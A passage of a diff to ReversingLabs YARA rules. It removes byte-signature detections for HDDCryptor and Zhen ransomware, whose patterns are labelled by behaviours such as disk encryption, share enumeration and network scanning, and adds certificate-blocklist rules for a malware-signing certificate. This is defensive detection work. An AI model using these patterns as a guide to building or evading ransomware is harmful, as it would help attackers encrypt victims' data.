MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "HDDCryptor" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $deploy_components = { - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 6A ?? 53 0F 85 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? - ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? - ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB - E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? - ?? 6A ?? 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? - ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB 8B F0 E8 ?? - ?? ?? ?? 8B F8 6A ?? 0F AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B - F0 6A ?? 0F AF F7 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F8 6A ?? 0F - AF FE 68 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8B F0 6A ?? 0F AF F7 68 ?? - ?? ?? ?? BA ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B F8 BA ?? ?? ?? - ?? 0F AF FE 8B CB E8 - } - $get_shares_info = { - E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? EB ?? FF 15 ?? ?? - ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 8D 44 24 ?? 50 C7 44 24 ?? - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - FF 15 - } - $encrypt_discs = { - 68 ?? ?? ?? ?? FF 74 24 ?? 0F 57 C0 66 0F 7F 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 33 C9 EB ?? 8D 49 ?? 0F B7 81 ?? ?? ?? ?? 66 89 84 0C ?? ?? ?? ?? 8D 49 ?? 66 - 85 C0 75 ?? 8D 8C 24 ?? ?? ?? ?? 83 C1 ?? 66 8B 41 ?? 8D 49 ?? 66 85 C0 75 ?? A1 ?? - ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 ?? A1 ?? ?? ?? ?? 89 41 - ?? A1 ?? ?? ?? ?? 89 41 ?? 0F B7 05 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 66 89 41 - ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - D7 B9 ?? ?? ?? ?? E8 - } - $create_diskcryptor_service = { - 83 EC ?? 53 55 56 57 68 ?? ?? ?? ?? 33 ED 8B F2 55 55 8B F9 FF 15 ?? ?? ?? ?? 85 C0 - 74 ?? 55 55 55 55 55 FF 74 24 ?? 55 6A ?? 5B 53 6A ?? 68 ?? ?? ?? ?? 56 57 50 FF 15 - ?? ?? ?? ?? 8B F0 89 5C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 33 - C9 89 44 24 ?? 41 8D 44 24 ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 53 56 89 4C 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? FF 15 ?? ?? ?? ?? 8B C6 5F 5E 5D 5B 83 C4 ?? - C3 - } - $extract_diskcryptor_from_resources = { - 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 8B B4 24 ?? ?? - ?? ?? 33 C0 57 50 89 54 24 ?? 8B E9 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B D8 56 - 0F B7 C9 51 53 FF 15 ?? ?? ?? ?? 8B F0 56 53 FF 15 ?? ?? ?? ?? 56 53 8B F8 FF 15 ?? - ?? ?? ?? 57 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 E8 ?? ?? ?? ?? 59 FF 74 - 24 ?? 8B D8 56 53 E8 ?? ?? ?? ?? 8B 54 24 ?? 33 FF 83 C4 ?? 8B CF 85 D2 7E ?? 8A 04 - 19 3C ?? 7C ?? 3C ?? 7F ?? 04 ?? 3C ?? 76 ?? 2C ?? 88 04 19 41 3B CA 7C ?? 33 C0 68 - ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F5 66 8B 45 - ?? 83 C5 ?? 66 3B C7 75 ?? 8D 7C 24 ?? 2B EE 83 EF ?? 33 C9 66 8B 47 ?? 83 C7 ?? 66 - 3B C1 75 ?? 8B CD C1 E9 ?? F3 A5 8B CD 83 E1 ?? F3 A4 8D 7C 24 ?? 83 EF ?? 33 ED 66 - 8B 47 ?? 8D 7F ?? 66 3B C5 75 ?? A1 ?? ?? ?? ?? 8B 54 24 ?? 8B F2 89 07 66 8B 02 83 - C2 ?? 66 3B C5 75 ?? 8D 7C 24 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C5 75 ?? - 8B CA 8D 44 24 ?? C1 E9 ?? F3 A5 55 55 6A ?? 55 55 8B CA 83 E1 ?? 68 ?? ?? ?? ?? F3 - A4 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 55 8D 44 24 ?? 50 FF 74 24 ?? 53 56 FF - 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 33 C0 40 EB ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 - C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 - } - $encrypt_files_using_diskcryptor_p1 = { - 55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? - ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ?? - ?? ?? 64 A3 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 83 7D ?? ?? 73 ?? B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 8B 75 ?? BA ?? ?? ?? ?? 8B 4E ?? 8A 01 41 88 02 42 84 C0 75 ?? 8B 4E ?? BA - ?? ?? ?? ?? 8A 01 41 88 02 42 84 C0 75 ?? 6A ?? 59 BE ?? ?? ?? ?? C7 05 ?? ?? ?? ?? - ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? - 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 89 B4 24 ?? ?? ?? ?? - 8D 4C 24 ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 7C 24 ?? ?? 8D 44 24 ?? 56 0F 43 44 24 ?? 56 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 DB C7 44 - } - $encrypt_files_using_diskcryptor_p2 = { - 24 ?? ?? ?? ?? ?? 50 89 5C 24 ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B D0 59 59 85 D2 - 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 8B D0 8D BC 24 ?? ?? ?? ?? 83 EF ?? 66 - 8B 47 ?? 8D 7F ?? 66 3B C3 75 ?? A1 ?? ?? ?? ?? 83 C2 ?? 89 07 8B F2 66 8B 02 83 C2 - ?? 66 3B C3 75 ?? 8D BC 24 ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 - 75 ?? 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 51 50 83 EC ?? - 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 - 24 ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8B D6 8B C8 - E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 53 6A ?? 8D 4C 24 ?? - C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 74 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B F3 EB ?? FF 15 ?? ?? ?? ?? 8B F0 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? - 8B C6 EB ?? 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 64 89 0D - ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $reboot = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 - FF 15 ?? ?? ?? ?? 56 56 56 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 - ?? ?? ?? ?? F7 D8 1B C0 F7 D8 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ((($deploy_components) and ($get_shares_info) and ($encrypt_discs)) or (($extract_diskcryptor_from_resources) and ($create_diskcryptor_service) and ( all of ($encrypt_files_using_diskcryptor_p*)) and ($reboot))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Tecnopolis Consulting Ltd" and pe.signatures[i].serial=="73:bf:f2:fb:71:4f:98:6c:17:07:16:5f:0b:0f:2e:0e" and 1090886400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Zhen : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_33B24170694Ca0Cf4D2Bdf4Aadf475A3 : INFO FILE { meta: - description = "Yara rule that detects Zhen ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ce6bc48d-934b-582c-8ce7-3dd595cbf5dd" - date = "2021-04-28" - modified = "2021-04-28" + id = "c02d7aaf-e88a-5aba-a8ee-db34562e53b1" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Zhen.yara#L1-L176" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "17b24e7baeccd90b8695eb8d21d9ee4a317806ed7713252d315d06bee3f93e65" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14058-L14074" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "795bcb46b41ded084e4d12d98e335748ec1db3e0abbbb2d933e819d955075138" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Zhen" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B 41 ?? C1 E0 ?? 8B 4D ?? 8B 49 ?? 03 C8 FF 15 - ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? FF 15 ?? ?? - ?? ?? 8D 55 ?? 8B 4D ?? 83 C1 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? - ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D - 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 - E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D - } - $find_files_p2 = { - 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 - ?? 52 E8 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 - ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 - ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 11 89 95 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B 4D ?? 89 48 ?? 8B 55 - ?? 89 50 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C4 8B 4D ?? 89 08 8B 55 ?? 89 50 ?? 8B - 4D ?? 89 48 ?? 8B 55 ?? 89 50 ?? 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 91 - ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? EB ?? 8D - 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? - ?? C3 C3 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? - 5F 5E 5B 8B E5 5D C2 - } - $encrypt_files_p1 = { - 55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 66 89 45 ?? 8D 4D ?? FF 15 ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 52 66 8B 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 6A ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 E8 ?? 50 6A ?? 6A ?? - 8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 - 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B - 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 8B - 02 8B 4D ?? 51 FF 50 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 - 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 66 89 45 - ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 8B 02 50 66 8B 4D ?? 51 - } - $encrypt_files_p2 = { - 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? FF 15 ?? - ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 89 45 ?? 83 7D - ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? - EB ?? C7 45 ?? ?? ?? ?? ?? 66 8B 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8D 4D ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 8D 45 ?? 50 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 4D ?? 51 FF 15 ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? FF 15 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 8B 55 ?? 52 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? 8B 45 ?? 8B 08 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 50 8B 45 ?? 8B 08 51 8D 55 ?? 52 - FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 FF 15 - ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? - FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? FF 15 ?? ?? ?? ?? - 68 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D - ?? FF 15 ?? ?? ?? ?? C3 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 - ?? ?? ?? ?? C3 8B 4D ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B - 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 - } - $scan_network_p1 = { - 55 8B EC 83 EC ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 FF 51 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 08 8B 55 ?? 52 - FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 4D ?? 51 8B - 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 89 85 ?? ?? ?? ?? - 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? FF - 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D - 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D - 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D - 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? - 8B 08 8B 55 ?? 52 FF 91 ?? ?? ?? ?? 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ?? 51 FF 90 ?? ?? ?? ?? DB E2 - 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? - ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8D 45 ?? 50 FF - } - $scan_network_p2 = { - 15 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF - 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? - ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? - ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 - 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 2B - 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? B9 - ?? ?? ?? ?? 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? - ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? 2B - 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 4D ?? BA - ?? ?? ?? ?? 2B 51 ?? 8B 45 ?? 8B 48 ?? 8B 14 91 52 FF 15 ?? ?? ?? ?? DC AD ?? ?? ?? - ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ?? - 33 C9 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? 